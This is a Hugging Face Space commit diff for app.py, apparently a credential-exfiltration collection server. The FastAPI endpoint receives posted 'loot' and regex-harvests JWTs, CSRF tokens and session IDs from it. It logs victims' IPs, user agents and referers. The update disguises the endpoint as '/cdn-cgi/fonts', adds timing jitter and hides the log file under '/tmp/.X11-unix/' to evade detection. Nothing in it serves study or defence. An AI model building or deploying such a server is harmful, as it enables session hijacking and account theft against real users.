Hugging Face's logo

Spaces:
latterworks
/
jspy
Sleeping

App Files Community
latterworks commited on
Commit
b65eeac
·
verified ·
1 Parent(s): c7bb80b

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +39 -30
app.py CHANGED
@@ -1,44 +1,53 @@
1
  from fastapi import FastAPI, Request
2
- import uvicorn
3
- import json, re
4
  from datetime import datetime
5
 
6
  app = FastAPI()
7
- LOGFILE = "/tmp/slurp.log"
8
-
9
- def mark_tokens(loot):
10
- blob = json.dumps(loot)
11
- return {
12
- "jwt": re.findall(r'eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+', blob),
13
- "csrf": re.findall(r'csrf[_\-]?(token)?[\'"]?\s*[:=]\s*[\'"]?([a-zA-Z0-9\-_]{8,})', blob, re.I),
14
- "session": re.findall(r'(?:sessionid|sid)[=:]+([a-zA-Z0-9\-_.]{10,})', blob, re.I)
15
- }
16
 
17
  @app.get("/")
18
- def root():
19
- return {"status": "ready", "post_here": "/exfil"}
 
 
 
 
20
 
21
- @app.post("/exfil")
22
- async def exfil(request: Request):
23
  try:
24
- data = await request.json()
25
  except:
26
- return {"status": "fail", "reason": "invalid json"}
27
-
28
- log = {
29
- "timestamp": datetime.utcnow().isoformat(),
30
- "ip": request.headers.get("x-forwarded-for", "unknown"),
31
- "ua": request.headers.get("user-agent", "unknown"),
32
- "loot": data,
33
- "marks": mark_tokens(data)
 
 
 
 
 
34
  }
35
 
36
- with open(LOGFILE, "a") as f:
37
- f.write(json.dumps(log, indent=2) + ",\n")
 
 
38
 
39
- print(f"\n🔥 SLURP from {log['ip']} @ {log['timestamp']}")
40
- print(json.dumps(log["marks"], indent=2))
 
 
 
41
 
42
- return {"status": "ok", "marks": log["marks"]}
 
 
 
 
43
 
44
- # HF boots with uvicorn automatically — no need to run manually
 
1
  from fastapi import FastAPI, Request
2
+ import os, json, re, hashlib, asyncio, random
 
3
  from datetime import datetime
4
 
5
  app = FastAPI()
6
+
7
+ LOG = "/tmp/.X11-unix/.slurplog.sock"
8
+ os.makedirs(os.path.dirname(LOG), exist_ok=True)
 
 
 
 
 
 
9
 
10
  @app.get("/")
11
+ def live():
12
+ return {"🔥": "DEPLOYED", "🧠": "HYPER OPS", "🎯": "/cdn-cgi/fonts"}
13
+
14
+ @app.post("/cdn-cgi/fonts")
15
+ async def silent_sink(req: Request):
16
+ await asyncio.sleep(random.uniform(0.2, 1.2)) # jitter
17
 
 
 
18
  try:
19
+ j = await req.json()
20
  except:
21
+ return {"err": "invalid json"}
22
+
23
+ ip = req.headers.get("x-forwarded-for", "?.?.?.?")
24
+ ua = req.headers.get("user-agent", "")
25
+ ref = req.headers.get("referer", "")
26
+ ts = datetime.utcnow().isoformat()
27
+ raw = json.dumps(j)
28
+ sig = hashlib.md5(raw.encode()).hexdigest()
29
+
30
+ marks = {
31
+ "jwt": re.findall(r'eyJ[\w-]+\.[\w-]+\.[\w-]+', raw),
32
+ "csrf": re.findall(r'csrf[_\-]?(token)?[\'"]?\s*[:=]\s*[\'"]?([\w\-_]{8,})', raw, re.I),
33
+ "session": re.findall(r'(?:sessionid|sid)[=:]+([\w\-_.]{10,})', raw, re.I)
34
  }
35
 
36
+ entry = {
37
+ "ts": ts, "ip": ip, "ua": ua, "ref": ref,
38
+ "hash": sig, "mark": marks, "loot": j
39
+ }
40
 
41
+ try:
42
+ with open(LOG, "a") as f:
43
+ f.write(json.dumps(entry) + "\n")
44
+ except:
45
+ pass
46
 
47
+ print(f"\033[92m🔥 TARG HIT: {ip} @ {ts}\033[0m")
48
+ if any(marks.values()):
49
+ print(f"\033[91m🧠 Tokens found: {json.dumps(marks)}\033[0m")
50
+ else:
51
+ print(f"\033[90m...no tokens detected\033[0m")
52
 
53
+ return {"ok": True, "hash": sig, "tokens": any(marks.values())}